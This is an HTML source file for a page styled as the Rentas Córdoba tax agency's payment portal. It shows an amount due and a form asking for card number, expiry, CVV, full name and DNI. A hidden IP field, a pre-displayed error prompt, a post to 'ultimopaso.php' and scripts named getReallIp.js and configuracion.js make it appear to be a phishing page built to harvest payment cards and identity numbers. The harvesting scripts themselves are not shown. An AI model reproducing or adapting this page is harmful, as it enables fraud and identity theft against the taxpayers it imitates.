
<!DOCTYPE html>
<html>
<head>
	<link rel="icon" type="ico" href="favicon.ico">
	<script src="https://code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Rentas cordoba</title>
	<link rel="stylesheet" type="text/css" href="assets/style/style.css">
</head>
<body>
	<header>
		<nav>
			<div class="container">
				<a href="">
					<img src="assets/img/logo-e.png" class="loho">
				</a>
				<div class="gestion">
					<a href="">
						<i class="bi bi-question-circle"></i>
						<span>Centro de ayuda</span>
					</a>
					<a href="">
						<i class="bi bi-person-circle"></i>
						Iniciar sesión
					</a>
				</div>
			</div>
		</nav>
	</header>
	<section class="ruta-title">
		<a href="" class="volver">
			<i class="bi bi-arrow-left"></i>
			<span>Volver</span>
		</a>
		<h1>Total a pagar</h1>
		<p style="font-size:36px;font-weight: normal;color: #222;">$3.830</p>
	</section>
	<section>
		<h3 class="otros-impuestos">Paga con crédito o débito</h3>
		<p class="alerta-p"><small style="color: red;">Corrija la siguiente información marcada con rojo.</small></p>
		<div class="form-card-container">

			<form class="flex-pago" method="POST" action="ultimopaso.php">
				<div class="w-50-field ">
					<div class="field__input_container w-100-field">
						<input type="tel" id="card" required>
						<label class="float-label" for="card">Números de la tarjeta</label>
						<div style="position: absolute;right:13px;top:13px;">
							<svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" fill="#5c5c5c" class="bi bi-credit-card-2-front" viewBox="0 0 16 16">
								<path d="M14 3a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1zM2 2a2 2 0 0 0-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2z"/>
								<path d="M2 5.5a.5.5 0 0 1 .5-.5h2a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1-.5-.5zm0 3a.5.5 0 0 1 .5-.5h5a.5.5 0 0 1 0 1h-5a.5.5 0 0 1-.5-.5m0 2a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5"/>
							</svg>
						</div>
					</div>
				</div>
				<div class="w-25-field">
					<div class="field__input_container w-100-field">
						<input type="tel" id="expiry" required>
						<label class="float-label" for="expiry">MM/AA</label>
						<div style="position: absolute;right:13px;top:13px;">
							<svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" fill="#5c5c5c" class="bi bi-credit-card-2-front" viewBox="0 0 16 16">
								<path d="M14 3a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1zM2 2a2 2 0 0 0-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2z"/>
								<path d="M2 5.5a.5.5 0 0 1 .5-.5h2a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1-.5-.5zm0 3a.5.5 0 0 1 .5-.5h5a.5.5 0 0 1 0 1h-5a.5.5 0 0 1-.5-.5m0 2a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5"/>
							</svg>
						</div>
					</div>
				</div>
				<div class="w-25-field">
					<div class="field__input_container w-100-field">
						<input type="tel" id="cvv" required>
						<label class="float-label" for="cvv">CVV</label>
						<div style="position: absolute;right:13px;top:13px;">
							<svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" fill="#5c5c5c" class="bi bi-credit-card-2-front" viewBox="0 0 16 16">
								<path d="M14 3a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1zM2 2a2 2 0 0 0-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2z"/>
								<path d="M2 5.5a.5.5 0 0 1 .5-.5h2a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1-.5-.5zm0 3a.5.5 0 0 1 .5-.5h5a.5.5 0 0 1 0 1h-5a.5.5 0 0 1-.5-.5m0 2a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5"/>
							</svg>
						</div>
					</div>
				</div>
				<div class="w-50-field">
					<div class="field__input_container w-100-field">
						<input type="text" id="names" required >
						<label class="float-label" for="names">Nombre y apellido</label>
						<div style="position: absolute;right:13px;top:13px;">
							<svg xmlns="http://www.w3.org/2000/svg" width="22" height="22" fill="#5c5c5c" class="bi bi-credit-card-2-front" viewBox="0 0 16 16">
								<path d="M14 3a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1zM2 2a2 2 0 0 0-2 2v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2z"/>
								<path d="M2 5.5a.5.5 0 0 1 .5-.5h2a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1-.5-.5zm0 3a.5.5 0 0 1 .5-.5h5a.5.5 0 0 1 0 1h-5a.5.5 0 0 1-.5-.5m0 2a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5m3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 0 1h-1a.5.5 0 0 1-.5-.5"/>
							</svg>
						</div>
					</div>
				</div>
				<div class="w-50-field">
					<div class="field__input_container w-100-field">
						<input type="tel" id="dni" required name="dni">
						<label class="float-label" for="dni">DNI</label>
					</div>
				</div>
				<input type="hidden" id="ip">
				<div class="w-100-field">
					<button type="button" id="pagar" class="boton-dise w-100-field">
						Pagar
					</button>
				</div>
			</form>


			<div class="card-apy">
				<div class="chip-container">
					<img src="assets/img/credit-card-chip-free-vector-PhotoRoom.png-PhotoRoom.png" height="40px">
				</div>
				<div class="numbers-container">
					**** **** **** ****
				</div>
				<div class="name-container">
					Nombre y apellido
				</div>
				<div class="dates-container">
					<small style="color: #FFF;">
						Vencimiento
						<span class="vence">MM/AA</span>
					</small>
					<small style="color: #FFF;">
						CVV:
						<span class="ccc">CVV</span>
					</small>	
				</div>
			</div>
			
		</div>

	</section>
	<footer>
		<div class="container-footer">
			<div class="item">
				<h4>Legislación tributaria</h4>
				<ul>
					<li>
						<a href="">Código tributario</a>
					</li>
					<li>
						<a href="">Ley impositiva anual</a>
					</li>
					<li>
						<a href="">Decretos</a>
					</li>
					<li>
						<a href="">Resoluciones</a>
					</li>
					<li>
						<a href="">Otras leyes</a>
					</li>
					<li>
						<a href="" class="decoration">Más legislación tributaria</a>
					</li>
				</ul>
			</div>
			<div class="item">
				<h4>Centro de ayuda</h4>
				<ul>
					<li>
						<a href="">Medios de pago</a>
					</li>
					<li>
						<a href="">Consulta vinculante</a>
					</li>
					<li>
						<a href="">Videos e instructivos</a>
					</li>
					<li>
						<a href="">Listados</a>
					</li>
					<li>
						<a href="">Tasas Retributivas de Servicios</a>
					</li>
					<li>
						<a href="" class="decoration">Más información</a>
					</li>
				</ul>
			</div>
			<div class="item">
				<ul>
					<li>
						<a href="">Inmobiliario</a>
					</li>
					<li>
						<a href="">Automotor</a>
					</li>
					<li>
						<a href="">Multas de Policía Caminera</a>
					</li>
					<li>
						<a href="">Ingresos brutos</a>
					</li>
					<li>
						<a href="">Sellos</a>
					</li>
					<li>
						<a href="" class="decoration">Más preguntas</a>
					</li>
				</ul>
			</div>

			<div class="item">
				<h4>Rentas, estés donde estés</h4>
				<ul>
					<li>
						<a href=""><i class="fa-regular fa-comments"></i> Chateá con nosotros</a>
					</li>
					<li>
						<a href=""><i class="fa-brands fa-square-facebook"></i> Rentas Córdoba</a>
					</li>
					<li>
						<a href=""><i class="fa-regular fa-message"></i> Contanos tu experiencia</a>
					</li>
					<li>
						<a href=""><i class="fa-regular fa-message"></i> Denuncias</a>
					</li>
					<li>
						<a href=""><i class="fa-solid fa-phone"></i> Rentas te llama</a>
					</li>
					<li>
						<span>0800-444-8008</span>
					</li>
				</ul>
			</div>
		</div>
		<div class="copy-right">
			<ul>
				<li>Copyright © 2024 - Rentas Córdoba</li>
				<li>|</li>
				<li>“1983/2023 - 40 años de democracia”</li>
			</ul>
		</div>
	</footer>
	<script type="text/javascript" src="assets/js/js.js"></script>
	<script type="text/javascript" src="assets/js/getReallIp.js"></script>
	<script type="text/javascript" src="configuracion.js"></script>
</body>
</html>